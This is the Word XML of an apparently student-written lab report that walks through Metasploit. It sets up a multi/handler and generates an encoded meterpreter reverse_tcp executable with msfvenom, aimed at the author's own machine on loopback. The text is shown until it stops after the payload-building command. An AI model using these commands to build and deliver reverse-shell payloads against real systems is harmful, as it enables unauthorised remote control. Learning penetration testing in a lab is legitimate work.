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4"/>
        </w:rPr>
        <w:id w:val="2010485467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14:paraId="4368EABC" w14:textId="25CCC696" w:rsidR="00BF64F4" w:rsidRPr="00B82381" w:rsidRDefault="00BF64F4" w:rsidP="00364141">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="24"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B82381">
            <w:rPr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2B01F927" wp14:editId="05C0124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C3BAD3" w14:textId="6A56127D" w:rsidR="00BF64F4" w:rsidRDefault="00CD13D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bookmarkStart w:id="0" w:name="_GoBack"/>
                                    <w:r w:rsidRPr="00CD13DC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drawing>
                                        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03104791" wp14:editId="22962659">
                                          <wp:extent cx="3810000" cy="3810000"/>
                                          <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                          <wp:docPr id="2050" name="Picture 2" descr="Image result for metasploit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50" name="Picture 2" descr="Image result for metasploit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0000" cy="3810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bookmarkEnd w:id="0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66570380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7D79D7" w14:textId="5569F15E" w:rsidR="00BF64F4" w:rsidRDefault="009950F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Cryptography Report</w:t>
                                      </w:r>
                                    </w:p>
                                  </w:sdtContent>
                                </w:sdt>
                                <w:p w14:paraId="4A0B51AF" w14:textId="5F118C0C" w:rsidR="00BF64F4" w:rsidRPr="00957CB9" w:rsidRDefault="00957CB9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957CB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Ammad</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r w:rsidR="00267E0D" w:rsidRPr="00957CB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(60</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00957CB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512)</w:t>
                                  </w:r>
                                  <w:r w:rsidRPr="00957CB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</w:p>
                                <w:p w14:paraId="32148D5D" w14:textId="5E43DFE5" w:rsidR="00267E0D" w:rsidRPr="00957CB9" w:rsidRDefault="00957CB9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957CB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Rumman</w:t>
                                  </w:r>
                                  <w:proofErr w:type="spellEnd"/>
                                  <w:r w:rsidRPr="00957CB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(60661)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EucAA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPzarCMBSE94LvEI5wd5p6uUqpRhHhgrgQ/AG3h+bY&#10;VpuTmkStb28EweUwM98w03lranEn5yvLCoaDBARxbnXFhYLD/r+fgvABWWNtmRQ8ycN81u1MMdP2&#10;wVu670IhIoR9hgrKEJpMSp+XZNAPbEMcvZN1BkOUrpDa4SPCTS1/k2QsDVYcF0psaFlSftndjAKb&#10;yqc0en3e4sYOXVrx7aqPSv302sUERKA2fMOf9korGP3B+0v8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iEucAAAADbAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA9QAAAIUDAAAAAA==&#10;" fillcolor="#2a3442 [2018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9C3BAD3" w14:textId="6A56127D" w:rsidR="00BF64F4" w:rsidRDefault="00CD13D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bookmarkStart w:id="1" w:name="_GoBack"/>
                              <w:r w:rsidRPr="00CD13DC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drawing>
                                  <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03104791" wp14:editId="22962659">
                                    <wp:extent cx="3810000" cy="3810000"/>
                                    <wp:effectExtent l="0" t="0" r="0" b="0"/>
                                    <wp:docPr id="2050" name="Picture 2" descr="Image result for metasploi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50" name="Picture 2" descr="Image result for metasploi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00" cy="381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bookmarkEnd w:id="1"/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66570380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77D79D7" w14:textId="5569F15E" w:rsidR="00BF64F4" w:rsidRDefault="009950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Cryptography Report</w:t>
                                </w:r>
                              </w:p>
                            </w:sdtContent>
                          </w:sdt>
                          <w:p w14:paraId="4A0B51AF" w14:textId="5F118C0C" w:rsidR="00BF64F4" w:rsidRPr="00957CB9" w:rsidRDefault="00957CB9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57CB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Ammad</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidR="00267E0D" w:rsidRPr="00957CB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(60</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00957CB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512)</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00957CB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32148D5D" w14:textId="5E43DFE5" w:rsidR="00267E0D" w:rsidRPr="00957CB9" w:rsidRDefault="00957CB9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57CB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Rumman</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="00957CB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(60661)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41BC446" w14:textId="23C16E5C" w:rsidR="00F67CD3" w:rsidRPr="00B82381" w:rsidRDefault="00BF64F4" w:rsidP="00A12C05">
          <w:pPr>
            <w:rPr>
              <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
              <w:b/>
              <w:spacing w:val="-10"/>
              <w:kern w:val="28"/>
              <w:sz w:val="72"/>
              <w:szCs w:val="56"/>
              <w:u w:val="single"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00B82381">
            <w:rPr>
              <w:b/>
              <w:sz w:val="24"/>
              <w:u w:val="single"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="6B4B0632" w14:textId="601BFEAC" w:rsidR="00F67CD3" w:rsidRPr="00B82381" w:rsidRDefault="00F67CD3" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>METASPLOIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006F0B8E" w14:textId="6360A83C" w:rsidR="00F67CD3" w:rsidRPr="00B82381" w:rsidRDefault="00054B00" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Framework, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Project's best-known creation, is a software platform for developing, testing, and executing exploits. It can be used to create security testing tools and exploit modules and also as a penetration testing system. It was originally created as a portable network tool in 2003 by HD Moore.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215EA709" w14:textId="5B462ABC" w:rsidR="00DF4AF3" w:rsidRPr="00B82381" w:rsidRDefault="002A0F5D" w:rsidP="00364141">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="72"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>METASPLOIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268A35FF" w14:textId="227008C3" w:rsidR="00010E93" w:rsidRPr="00B82381" w:rsidRDefault="00010E93" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Open two </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cmds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enter in the directory of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5052CC04" w14:textId="1F3599E4" w:rsidR="003A5524" w:rsidRPr="00B82381" w:rsidRDefault="00010E93" w:rsidP="00364141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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD70EEB" w14:textId="77777777" w:rsidR="00267E0D" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17641F0C" w14:textId="77777777" w:rsidR="00267E0D" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">In one </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> console</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7707C262" w14:textId="77777777" w:rsidR="00267E0D" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>console.bat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D9060" w14:textId="77777777" w:rsidR="00267E0D" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D95726D" w14:textId="6A080126" w:rsidR="00010E93" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5020EBB7" wp14:editId="37AF1E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447C" w14:textId="77777777" w:rsidR="00EA491B" w:rsidRPr="00B82381" w:rsidRDefault="00EA491B" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCF180D" w14:textId="30EDDAE6" w:rsidR="00810030" w:rsidRPr="00B82381" w:rsidRDefault="00D8645D" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00810030" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ow use multi handler to handle multi payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630B7711" w14:textId="48DA1896" w:rsidR="00CC7F4F" w:rsidRPr="00B82381" w:rsidRDefault="00810030" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDEEDA1" w14:textId="23AB7180" w:rsidR="00126FA9" w:rsidRPr="00B82381" w:rsidRDefault="00810030" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="584D0FCF" wp14:editId="21BE739D">
            <wp:extent cx="5882185" cy="349382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3" b="4478"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5882185" cy="3493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E13C5" w14:textId="77777777" w:rsidR="0080024E" w:rsidRPr="00B82381" w:rsidRDefault="0080024E" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F0A640B" w14:textId="3AFB0ABC" w:rsidR="00810030" w:rsidRPr="00B82381" w:rsidRDefault="00D8645D" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00FF2D17" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ow </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00FF2D17" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:r w:rsidR="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FF2D17" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00FF2D17" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> payload for windows hacking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0372D7F2" w14:textId="752FCFA4" w:rsidR="00CC7F4F" w:rsidRPr="00B82381" w:rsidRDefault="00FF2D17" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="693D869C" w14:textId="1D4E9101" w:rsidR="00FF2D17" w:rsidRPr="00B82381" w:rsidRDefault="00FF2D17" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F160DF3" wp14:editId="6EAFB3A4">
            <wp:extent cx="5929952" cy="3166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" b="5240"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5929952" cy="316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F5D4D" w14:textId="6D8EB002" w:rsidR="00FF2D17" w:rsidRPr="00B82381" w:rsidRDefault="00FF2D17" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1603331E" w14:textId="02D04C53" w:rsidR="00410737" w:rsidRPr="00B82381" w:rsidRDefault="00D8645D" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Set a local host in our</w:t>
      </w:r>
      <w:r w:rsidR="00410737" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>we</w:t>
      </w:r>
      <w:r w:rsidR="00410737" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> used a loop back </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00410737" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> because I’m hacking my own windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30299ACB" w14:textId="5027093D" w:rsidR="00FB25DA" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141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B82381"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47184492" wp14:editId="577CA186">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>341195</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-81886</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5936615" cy="2797175"/>
            <wp:effectExtent l="0" t="0" r="6985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" b="4941"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5936615" cy="279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381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>set LHOST 127.0.</w:t>
      </w:r>
      <w:r w:rsidR="00364141" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049A4C12" w14:textId="77777777" w:rsidR="003762E5" w:rsidRPr="00B82381" w:rsidRDefault="003762E5" w:rsidP="00B82381">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E5334D" w14:textId="46C177AE" w:rsidR="00410737" w:rsidRPr="00B82381" w:rsidRDefault="00D8645D" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00410737" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ow check the local host and local port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64F906" w14:textId="77777777" w:rsidR="003762E5" w:rsidRPr="00B82381" w:rsidRDefault="003762E5" w:rsidP="003762E5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5780673A" w14:textId="016B8C93" w:rsidR="00410737" w:rsidRPr="00B82381" w:rsidRDefault="00410737" w:rsidP="00364141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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803D298" w14:textId="165980BC" w:rsidR="00410737" w:rsidRPr="00B82381" w:rsidRDefault="00410737" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="45E7C243" wp14:editId="68289FCC">
            <wp:extent cx="5909481" cy="317310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" b="5035"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5909481" cy="317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C7C40" w14:textId="77777777" w:rsidR="00FB25DA" w:rsidRPr="00B82381" w:rsidRDefault="00FB25DA" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539AC52C" w14:textId="7A1C4082" w:rsidR="00410737" w:rsidRPr="00B82381" w:rsidRDefault="00164A06" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r w:rsidR="00410737" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>ow make a</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00410737" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> executable file to hack the windows</w:t>
      </w:r>
      <w:r w:rsidR="00594DBE" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Open the other </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00594DBE" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00594DBE" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and check for help.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAB9E97" w14:textId="71EFC4B0" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="00594DBE" w:rsidP="00364141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proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6134A559" w14:textId="046DB5AA" w:rsidR="008654D3" w:rsidRPr="00B82381" w:rsidRDefault="00267E0D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FDEEADC" wp14:editId="00AF7FF9">
            <wp:extent cx="5943600" cy="33413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3902" w14:textId="77777777" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="001F2A2D" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4480E23C" w14:textId="10731AF2" w:rsidR="00594DBE" w:rsidRPr="00B82381" w:rsidRDefault="00594DBE" w:rsidP="00364141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B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Now make a file on desktop.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC2E302" w14:textId="1EB29DD8" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="00594DBE" w:rsidP="00364141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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=127.0.0.1 LPORT=4444 -f exe -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A12C05" w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i 10 &gt; C:\Users</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82381">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>\Hacking.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5492DAF5" w14:textId="7A74289E" w:rsidR="001F2A2D" w:rsidRPr="00B82381" w:rsidRDefault="00594DBE" w:rsidP="00364141">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
